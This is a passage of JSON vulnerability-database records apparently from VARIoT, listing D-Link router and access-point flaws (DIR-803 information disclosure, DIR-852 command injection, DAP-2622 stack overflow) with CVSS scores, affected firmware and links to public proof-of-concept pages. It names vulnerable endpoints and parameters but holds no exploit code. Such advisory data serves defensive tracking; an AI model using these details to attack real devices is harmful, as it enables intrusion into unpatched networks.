"date": "2025-11-17T19:04:49.447000",
"db": "NVD",
"id": "CVE-2025-60675"
}
]
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "D-Link\u00a0Corporation\u00a0 of \u00a0DIR-823G\u00a0 Command injection vulnerability in firmware",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2025-019458"
}
],
"trust": 0.8
}
}
VAR-202512-0195
Vulnerability from variot - Updated: 2025-12-20 23:39A vulnerability was detected in D-Link DIR-803 up to 1.04. Impacted is an unknown function of the file /getcfg.php of the component Configuration Handler. The manipulation of the argument AUTHORIZED_GROUP results in information disclosure. The attack may be performed from remote. The exploit is now public and may be used. This vulnerability only affects products that are no longer supported by the maintainer. D-Link Corporation of DIR-803 There are unspecified vulnerabilities in the firmware.Information may be obtained
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-202512-0195",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "dir-803",
"scope": "lte",
"trust": 1.0,
"vendor": "dlink",
"version": "1.04"
},
{
"model": "dir-803",
"scope": "lte",
"trust": 0.8,
"vendor": "d link",
"version": "dir-803 firmware 1.04 and earlier"
},
{
"model": "dir-803",
"scope": null,
"trust": 0.8,
"vendor": "d link",
"version": null
},
{
"model": "dir-803",
"scope": "eq",
"trust": 0.8,
"vendor": "d link",
"version": null
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2025-022068"
},
{
"db": "NVD",
"id": "CVE-2025-14528"
}
]
},
"cve": "CVE-2025-14528",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "cna@vuldb.com",
"availabilityImpact": "NONE",
"baseScore": 5.0,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 10.0,
"id": "CVE-2025-14528",
"impactScore": 2.9,
"integrityImpact": "NONE",
"severity": "MEDIUM",
"trust": 1.0,
"vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N",
"version": "2.0"
},
{
"acInsufInfo": null,
"accessComplexity": "Low",
"accessVector": "Network",
"authentication": "None",
"author": "OTHER",
"availabilityImpact": "None",
"baseScore": 5.0,
"confidentialityImpact": "Partial",
"exploitabilityScore": null,
"id": "JVNDB-2025-022068",
"impactScore": null,
"integrityImpact": "None",
"obtainAllPrivilege": null,
"obtainOtherPrivilege": null,
"obtainUserPrivilege": null,
"severity": "Medium",
"trust": 0.8,
"userInteractionRequired": null,
"vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N",
"version": "2.0"
}
],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"author": "cna@vuldb.com",
"availabilityImpact": "NONE",
"baseScore": 5.3,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"exploitabilityScore": 3.9,
"id": "CVE-2025-14528",
"impactScore": 1.4,
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"trust": 1.0,
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N",
"version": "3.1"
},
{
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"author": "nvd@nist.gov",
"availabilityImpact": "NONE",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"exploitabilityScore": 3.9,
"id": "CVE-2025-14528",
"impactScore": 3.6,
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"trust": 1.0,
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
"version": "3.1"
},
{
"attackComplexity": "Low",
"attackVector": "Network",
"author": "NVD",
"availabilityImpact": "None",
"baseScore": 7.5,
"baseSeverity": "High",
"confidentialityImpact": "High",
"exploitabilityScore": null,
"id": "JVNDB-2025-022068",
"impactScore": null,
"integrityImpact": "None",
"privilegesRequired": "None",
"scope": "Unchanged",
"trust": 0.8,
"userInteraction": "None",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
"version": "3.0"
}
],
"severity": [
{
"author": "cna@vuldb.com",
"id": "CVE-2025-14528",
"trust": 1.0,
"value": "Medium"
},
{
"author": "nvd@nist.gov",
"id": "CVE-2025-14528",
"trust": 1.0,
"value": "HIGH"
},
{
"author": "OTHER",
"id": "JVNDB-2025-022068",
"trust": 0.8,
"value": "High"
}
]
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2025-022068"
},
{
"db": "NVD",
"id": "CVE-2025-14528"
},
{
"db": "NVD",
"id": "CVE-2025-14528"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "A vulnerability was detected in D-Link DIR-803 up to 1.04. Impacted is an unknown function of the file /getcfg.php of the component Configuration Handler. The manipulation of the argument AUTHORIZED_GROUP results in information disclosure. The attack may be performed from remote. The exploit is now public and may be used. This vulnerability only affects products that are no longer supported by the maintainer. D-Link Corporation of DIR-803 There are unspecified vulnerabilities in the firmware.Information may be obtained",
"sources": [
{
"db": "NVD",
"id": "CVE-2025-14528"
},
{
"db": "JVNDB",
"id": "JVNDB-2025-022068"
}
],
"trust": 1.62
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2025-14528",
"trust": 2.6
},
{
"db": "VULDB",
"id": "335869",
"trust": 1.8
},
{
"db": "JVNDB",
"id": "JVNDB-2025-022068",
"trust": 0.8
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2025-022068"
},
{
"db": "NVD",
"id": "CVE-2025-14528"
}
]
},
"id": "VAR-202512-0195",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "VARIoT devices database",
"id": null
}
],
"trust": 0.75
},
"last_update_date": "2025-12-20T23:39:14.888000Z",
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-284",
"trust": 1.0
},
{
"problemtype": "CWE-200",
"trust": 1.0
},
{
"problemtype": "NVD-CWE-noinfo",
"trust": 1.0
},
{
"problemtype": "information leak (CWE-200) [ others ]",
"trust": 0.8
},
{
"problemtype": " Inappropriate access control (CWE-284) [ others ]",
"trust": 0.8
},
{
"problemtype": " Lack of information (CWE-noinfo) [NVD evaluation ]",
"trust": 0.8
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2025-022068"
},
{
"db": "NVD",
"id": "CVE-2025-14528"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 1.8,
"url": "https://github.com/madgeaaaaa/my_vuln_2/blob/main/d-link/vuln-2/dir-803%20authentication%20bypass.md"
},
{
"trust": 1.8,
"url": "https://github.com/madgeaaaaa/my_vuln_2/blob/main/d-link/vuln-2/dir-803%20authentication%20bypass.md#poc"
},
{
"trust": 1.8,
"url": "https://vuldb.com/?id.335869"
},
{
"trust": 1.8,
"url": "https://vuldb.com/?submit.703150"
},
{
"trust": 1.8,
"url": "https://www.dlink.com/"
},
{
"trust": 1.0,
"url": "https://vuldb.com/?ctiid.335869"
},
{
"trust": 0.8,
"url": "https://nvd.nist.gov/vuln/detail/cve-2025-14528"
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2025-022068"
},
{
"db": "NVD",
"id": "CVE-2025-14528"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "JVNDB",
"id": "JVNDB-2025-022068"
},
{
"db": "NVD",
"id": "CVE-2025-14528"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2025-12-17T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2025-022068"
},
{
"date": "2025-12-11T17:15:56.037000",
"db": "NVD",
"id": "CVE-2025-14528"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2025-12-17T02:11:00",
"db": "JVNDB",
"id": "JVNDB-2025-022068"
},
{
"date": "2025-12-15T19:33:27.230000",
"db": "NVD",
"id": "CVE-2025-14528"
}
]
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "D-Link\u00a0Corporation\u00a0 of \u00a0DIR-803\u00a0 Firmware vulnerabilities",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2025-022068"
}
],
"trust": 0.8
}
}
VAR-202511-2274
Vulnerability from variot - Updated: 2025-12-20 23:36A vulnerability was identified in D-Link DIR-852 1.00. This issue affects some unknown processing of the file /gena.cgi. Such manipulation of the argument service leads to command injection. The attack can be executed remotely. The exploit is publicly available and might be used. This vulnerability only affects products that are no longer supported by the maintainer. (DoS) It may be in a state
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-202511-2274",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "dir-852",
"scope": "eq",
"trust": 1.0,
"vendor": "dlink",
"version": "1.00"
},
{
"model": "dir-852",
"scope": "eq",
"trust": 0.8,
"vendor": "d link",
"version": null
},
{
"model": "dir-852",
"scope": null,
"trust": 0.8,
"vendor": "d link",
"version": null
},
{
"model": "dir-852",
"scope": "eq",
"trust": 0.8,
"vendor": "d link",
"version": "dir-852 firmware 1.00"
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2025-020427"
},
{
"db": "NVD",
"id": "CVE-2025-13562"
}
]
},
"cve": "CVE-2025-13562",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "cna@vuldb.com",
"availabilityImpact": "PARTIAL",
"baseScore": 7.5,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 10.0,
"id": "CVE-2025-13562",
"impactScore": 6.4,
"integrityImpact": "PARTIAL",
"severity": "HIGH",
"trust": 1.0,
"vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P",
"version": "2.0"
},
{
"acInsufInfo": null,
"accessComplexity": "Low",
"accessVector": "Network",
"authentication": "None",
"author": "OTHER",
"availabilityImpact": "Partial",
"baseScore": 7.5,
"confidentialityImpact": "Partial",
"exploitabilityScore": null,
"id": "JVNDB-2025-020427",
"impactScore": null,
"integrityImpact": "Partial",
"obtainAllPrivilege": null,
"obtainOtherPrivilege": null,
"obtainUserPrivilege": null,
"severity": "High",
"trust": 0.8,
"userInteractionRequired": null,
"vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P",
"version": "2.0"
}
],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"author": "cna@vuldb.com",
"availabilityImpact": "LOW",
"baseScore": 7.3,
"baseSeverity": "HIGH",
"confidentialityImpact": "LOW",
"exploitabilityScore": 3.9,
"id": "CVE-2025-13562",
"impactScore": 3.4,
"integrityImpact": "LOW",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"trust": 1.0,
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L",
"version": "3.1"
},
{
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"author": "nvd@nist.gov",
"availabilityImpact": "HIGH",
"baseScore": 9.8,
"baseSeverity": "CRITICAL",
"confidentialityImpact": "HIGH",
"exploitabilityScore": 3.9,
"id": "CVE-2025-13562",
"impactScore": 5.9,
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"trust": 1.0,
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
{
"attackComplexity": "Low",
"attackVector": "Network",
"author": "NVD",
"availabilityImpact": "High",
"baseScore": 9.8,
"baseSeverity": "Critical",
"confidentialityImpact": "High",
"exploitabilityScore": null,
"id": "JVNDB-2025-020427",
"impactScore": null,
"integrityImpact": "High",
"privilegesRequired": "None",
"scope": "Unchanged",
"trust": 0.8,
"userInteraction": "None",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.0"
}
],
"severity": [
{
"author": "cna@vuldb.com",
"id": "CVE-2025-13562",
"trust": 1.0,
"value": "Medium"
},
{
"author": "nvd@nist.gov",
"id": "CVE-2025-13562",
"trust": 1.0,
"value": "CRITICAL"
},
{
"author": "OTHER",
"id": "JVNDB-2025-020427",
"trust": 0.8,
"value": "Critical"
}
]
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2025-020427"
},
{
"db": "NVD",
"id": "CVE-2025-13562"
},
{
"db": "NVD",
"id": "CVE-2025-13562"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "A vulnerability was identified in D-Link DIR-852 1.00. This issue affects some unknown processing of the file /gena.cgi. Such manipulation of the argument service leads to command injection. The attack can be executed remotely. The exploit is publicly available and might be used. This vulnerability only affects products that are no longer supported by the maintainer. (DoS) It may be in a state",
"sources": [
{
"db": "NVD",
"id": "CVE-2025-13562"
},
{
"db": "JVNDB",
"id": "JVNDB-2025-020427"
}
],
"trust": 1.62
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2025-13562",
"trust": 2.6
},
{
"db": "VULDB",
"id": "333327",
"trust": 1.8
},
{
"db": "JVNDB",
"id": "JVNDB-2025-020427",
"trust": 0.8
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2025-020427"
},
{
"db": "NVD",
"id": "CVE-2025-13562"
}
]
},
"id": "VAR-202511-2274",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "VARIoT devices database",
"id": null
}
],
"trust": 1.0
},
"last_update_date": "2025-12-20T23:36:29.894000Z",
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-77",
"trust": 1.0
},
{
"problemtype": "CWE-74",
"trust": 1.0
},
{
"problemtype": "injection (CWE-74) [ others ]",
"trust": 0.8
},
{
"problemtype": " Command injection (CWE-77) [ others ]",
"trust": 0.8
},
{
"problemtype": " Command injection (CWE-77) [NVD evaluation ]",
"trust": 0.8
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2025-020427"
},
{
"db": "NVD",
"id": "CVE-2025-13562"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 1.8,
"url": "https://github.com/yzs17/cve/blob/main/dlink/dlink-dir852/rce2.md"
},
{
"trust": 1.8,
"url": "https://vuldb.com/?id.333327"
},
{
"trust": 1.8,
"url": "https://vuldb.com/?submit.697063"
},
{
"trust": 1.8,
"url": "https://www.dlink.com/"
},
{
"trust": 1.0,
"url": "https://vuldb.com/?ctiid.333327"
},
{
"trust": 0.8,
"url": "https://nvd.nist.gov/vuln/detail/cve-2025-13562"
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2025-020427"
},
{
"db": "NVD",
"id": "CVE-2025-13562"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "JVNDB",
"id": "JVNDB-2025-020427"
},
{
"db": "NVD",
"id": "CVE-2025-13562"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2025-11-28T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2025-020427"
},
{
"date": "2025-11-23T18:15:54.823000",
"db": "NVD",
"id": "CVE-2025-13562"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2025-11-28T02:45:00",
"db": "JVNDB",
"id": "JVNDB-2025-020427"
},
{
"date": "2025-11-26T17:28:15.490000",
"db": "NVD",
"id": "CVE-2025-13562"
}
]
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "D-Link\u00a0Corporation\u00a0 of \u00a0DIR-852\u00a0 Injection Vulnerability in Firmware",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2025-020427"
}
],
"trust": 0.8
}
}
VAR-202308-3135
Vulnerability from variot - Updated: 2025-12-19 22:28D-Link DAP-2622 DDP Set IPv4 Address Auth Username Stack-based Buffer Overflow Remote Code Execution Vulnerability. This vulnerability allows network-adjacent attackers to execute arbitrary code on affected installations of D-Link DAP-2622 routers. Authentication is not required to exploit this vulnerability.
The specific flaw exists within the DDP service. The issue results from the lack of proper validation of the length of user-supplied data prior to copying it to a fixed-length stack-based buffer. An attacker can leverage this vulnerability to execute code in the context of root. Was ZDI-CAN-20090. D-Link Systems, Inc. of DAP-2622 An out-of-bounds write vulnerability exists in firmware.Information is obtained, information is tampered with, and service operation is interrupted. (DoS) It may be in a state. The D-Link DAP-2622 is a wireless access point (AP) from D-Link that supports PoE power supply and is primarily used for wireless network coverage in enterprise or commercial settings
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-202308-3135",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "dap-2622",
"scope": null,
"trust": 2.1,
"vendor": "d link",
"version": null
},
{
"model": "dap-2622",
"scope": "lt",
"trust": 1.0,
"vendor": "dlink",
"version": "1.10b03r022"
},
{
"model": "dap-2622",
"scope": "eq",
"trust": 0.8,
"vendor": "d link",
"version": null
},
{
"model": "dap-2622",
"scope": "eq",
"trust": 0.8,
"vendor": "d link",
"version": "dap-2622 firmware 1.10b03r022"
}
],
"sources": [
{
"db": "ZDI",
"id": "ZDI-23-1267"
},
{
"db": "CNVD",
"id": "CNVD-2025-29683"
},
{
"db": "JVNDB",
"id": "JVNDB-2023-028905"
},
{
"db": "NVD",
"id": "CVE-2023-37313"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Dmitry \"InfoSecDJ\" Janushkevich of Trend Micro Zero Day Initiative",
"sources": [
{
"db": "ZDI",
"id": "ZDI-23-1267"
}
],
"trust": 0.7
},
"cve": "CVE-2023-37313",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"accessComplexity": "LOW",
"accessVector": "ADJACENT_NETWORK",
"authentication": "NONE",
"author": "CNVD",
"availabilityImpact": "COMPLETE",
"baseScore": 8.3,
"confidentialityImpact": "COMPLETE",
"exploitabilityScore": 6.5,
"id": "CNVD-2025-29683",
"impactScore": 10.0,
"integrityImpact": "COMPLETE",
"severity": "HIGH",
"trust": 0.6,
"vectorString": "AV:A/AC:L/Au:N/C:C/I:C/A:C",
"version": "2.0"
}
],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "ADJACENT",
"author": "zdi-disclosures@trendmicro.com",
"availabilityImpact": "HIGH",
"baseScore": 8.8,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"exploitabilityScore": 2.8,
"id": "CVE-2023-37313",
"impactScore": 5.9,
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"trust": 1.8,
"userInteraction": "NONE",
"vectorString": "CVSS:3.0/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.0"
},
{
"attackComplexity": "LOW",
"attackVector": "ADJACENT",
"author": "nvd@nist.gov",
"availabilityImpact": "HIGH",
"baseScore": 8.8,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"exploitabilityScore": 2.8,
"id": "CVE-2023-37313",
"impactScore": 5.9,
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"trust": 1.0,
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
{
"attackComplexity": "LOW",
"attackVector": "ADJACENT",
"author": "ZDI",
"availabilityImpact": "HIGH",
"baseScore": 8.8,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"exploitabilityScore": 2.8,
"id": "CVE-2023-37313",
"impactScore": 5.9,
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"trust": 0.7,
"userInteraction": "NONE",
"vectorString": "AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.0"
}
],
"severity": [
{
"author": "zdi-disclosures@trendmicro.com",
"id": "CVE-2023-37313",
"trust": 1.0,
"value": "HIGH"
},
{
"author": "nvd@nist.gov",
